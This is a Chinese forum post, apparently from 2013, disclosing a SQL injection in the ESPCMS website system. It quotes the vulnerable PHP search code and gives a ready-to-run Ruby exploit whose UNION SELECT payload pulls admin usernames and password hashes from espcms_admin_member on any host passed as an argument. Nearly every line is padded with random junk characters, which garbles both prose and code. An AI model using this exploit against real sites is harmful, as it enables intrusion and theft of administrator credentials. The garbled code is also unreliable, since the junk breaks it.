0×0 漏洞概述0×1 漏洞细节
6 b) \- |0 {$ ^2 C% T! {$ o0×2 PoC; T$ b+ t/ x2 f. w3 D- N* u
7 B+ f! d: t' n! H: ? m4 C: t* P6 d- ~' T+ m
& f+ p0 w" f8 e0×0 漏洞概述
" f! x0 y- F* @+ X- ?) S$ V8 {( {; t. a
# E+ Z& j- P, Y) h1 B* X7 H- I: C易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。0 M3 F$ o- D, x- }) O# F
其在处理传入的参数时考虑不严谨导致SQL注入发生# P/ e( `: I. m* M7 G6 \2 g% _7 d
" a' }. x. f% J( K) s
; I9 E: e! G; d4 S k2 s
0×1 漏洞细节9 R# V* s: D7 g0 G3 {* c* d+ m
& S n1 x6 C J. L& b Y
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
) O$ }1 H F- E5 B' I正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
2 {! n1 I0 m, X7 X. }而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
- p* n, t. P+ Z- @* O$ h& S( l! ?
+ q$ ^' _, C9 o v5 a, y8 Q. t在/interface/3gwap_search.php文件的in_result函数中:; C9 T% s- U- t# r1 k2 y5 v/ @
$ l z" Y' R7 B! R# b
- Z! J9 T7 x9 x
8 D' c/ ]8 ?( y4 O$ M function in_result() {
7 G4 |& K3 @) g7 \. j' t1 K6 y- y ... ... ... ... ... ... ... ... ...
6 V9 R( c( W3 Z+ T9 N8 ^6 o $urlcode = $_SERVER[ 'QUERY_STRING '];
# j' q) U T$ S5 B parse_str(html_entity_decode($urlcode), $output);
, x# Y- C4 f) y6 p0 E5 F. u
1 ~4 v1 L; [3 L' | ... ... ... ... ... ... ... ... ...
. z1 M R% k. w0 v. b# V if (is_array($output['attr' ]) && count($output['attr']) > 0) {! m* L% w- \& b' ]* X+ Y/ ]: v
; R2 ]0 p3 l/ \ $db_table = db_prefix . 'model_att';
% A$ C8 H" ^8 x$ t9 P5 n* Y) { Q7 c: k8 f7 ?) T: l
foreach ($output['attr' ] as $key => $value) {
; H3 b+ C- M# B+ ?- _/ x if ($value) {
0 n3 F* z+ G% T- Q, @! }# l2 Z" s3 q" O
$key = addslashes($key);
( R8 C5 \* J2 t Y1 v $key = $this-> fun->inputcodetrim($key);
5 @/ \; N- J! M$ h% D $db_att_where = " WHERE isclass=1 AND attrname='$key'";
0 u" i r) l9 b4 B, ?: D2 b0 X $countnum = $this->db_numrows($db_table, $db_att_where);2 N! A" l! b1 Q0 @
if ($countnum > 0) {
8 ]' u3 e n% {/ N $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
# q0 ~& Q, C) s# D0 f) n; J }! j' [& H x9 e* i% Y
}
$ ?" g+ Y7 D+ W5 N# t }
- `3 h M7 B+ j$ A2 }' q% K }
/ Z& Y5 L5 _3 l H" ]& u if (!empty ($keyword) && empty($keyname)) {- v8 J7 F* l- i7 r' B$ c9 M; y
$keyname = 'title';# ~- P4 d2 s9 m7 `3 q1 ?
$db_where.= " AND a.title like '%$keyword%'" ;
' R7 u3 g. P* I } elseif (!empty ($keyword) && !empty($keyname)) {/ e& V L% U. u3 K% ^
$db_where.= " AND $keyname like '% $keyword%'";* f' D0 ~8 q7 [2 g' P# m
}
+ i: E y8 g) C4 J3 k $pagemax = 15;
# N- t/ K- P. _8 E x
2 [( `: i7 T- g* p \2 E $pagesylte = 1;
" n" e8 B8 |5 ?) I* T6 o5 T" o9 P6 G
if ($countnum > 0) {+ Q# [- Z Q9 S) k8 M5 u& p
' M- S, n8 O6 i& t; V- x
$numpage = ceil($countnum / $pagemax);
# ~, Z9 O' {( l( U7 d } else {
# ~) W6 T% |! \2 r- P9 ~ $numpage = 1;4 p& n5 G& |: a! q! B
}# [" \7 h6 W, k; x" c B; p, x) \0 \
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
! M7 _, Y4 x3 z1 t $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
1 q9 y8 Z/ W. g: w8 y$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);5 e# J" x6 Y9 u' b
... ... ... ... ... ... ... ... ...0 ^! z& J& w# L! h6 E6 z1 ^* @
}- A" i& b2 q8 E6 @; b9 M# V: {
' l3 \4 l# R( \5 T3 c+ G1 V- p% L: v: z7 }
0×2 PoC' H6 n& m: w7 o1 O( }6 B
0 B1 ~3 o: M- j9 Y/ F1 h' e
/ K+ p8 {, X5 |$ G1 A7 ^( p- ^2 F' M$ X, x: E
require "net/http"& R$ C" P+ [ I/ r% e+ n
3 b( G; T9 X7 z0 t' h
def request(method, url)
! _1 y7 J7 b( m/ X+ i if method.eql?("get")
: k) ^* y0 e# z2 k$ D& V uri = URI.parse(url)" e7 d/ \, I* }% Q
http = Net::HTTP.new(uri.host, uri.port)% o2 g$ B' z' p+ F7 Q2 U
response = http.request(Net::HTTP::Get.new(uri.request_uri))# F0 ?5 U7 I, N1 S, J
return response
' ^+ v3 o4 [8 {3 c' f3 _ H; T1 e end
6 j F5 K) b, u: P5 k# cend
9 \1 D- @0 q# t% B) n& ]2 T6 _
: R( o3 \* ~0 fdoc =<<HERE! j8 f5 r# j$ Z7 A8 |4 R
-------------------------------------------------------7 L6 a3 j8 e3 n0 L1 G9 c
Espcms Injection Exploit- k4 C5 [6 {/ C/ @
Author:ztz: y1 f5 Y- G" N% |
Blog:http://ztz.fuzzexp.org/
% U. N( D( u. K5 y6 e-------------------------------------------------------: a( L3 {. ^, Z1 c( |. m
4 ?" B" P' x; G4 N4 ?/ ~
HERE+ b* ^4 @% X2 y% R: f2 v7 u' w; [
# p( B9 ?3 A: a* U& l
usage =<<HERE
" B; Y. ^2 |6 p6 c: U# t( T6 ^) f; l( DUsage: ruby #{$0} host port path1 a \' h9 U- C! }1 z
example: ruby #{$0} www.target.com 80 /8 S4 H3 Z3 ?. @3 A3 L9 Y# L* i
HERE1 K2 F9 Z) k/ ~. P/ a9 q( S( c
0 b4 P* }3 h* w5 Fputs doc
) [! ^; o0 F8 Uif ARGV.length < 30 T9 r0 l9 i; T3 n% n! M
puts usage N# D y" _: i5 Q$ N, @* y
else
3 \5 O! H$ @5 h' Q6 h3 V0 } $host = ARGV[0]# R! ]5 C1 S- D* k
$port = ARGV[1]4 u1 b) ?" A. @9 g$ Z; g
$path = ARGV[2]
( { K3 F* m4 \3 J& `" h
7 t; Y, C$ b! [$ \9 |3 }) } puts "send request..."& E5 T0 ^! v* c2 d. `
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
& C8 [8 i# C. A! d2 K5 R% u( Fattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13# s" T, w+ S6 j
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
% m. u+ R1 q7 [# `$ J2 |0 k,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
; g5 h+ R2 h1 F, @! s response = request("get", url)8 O3 G6 T2 `- A A; R
result = response.body.scan(/\w+&\w{32}/)$ `" P4 w7 o; @4 `7 A1 M3 D1 ]5 g9 L
puts result& n% m' ^' \9 d' b2 P$ R! @
end
$ d5 x y4 K4 o) v$ n4 {' K9 m- i7 Y) p9 ^3 \8 f) f( q
|
发表于 2013-7-27 18:31:52
收藏
支持
反对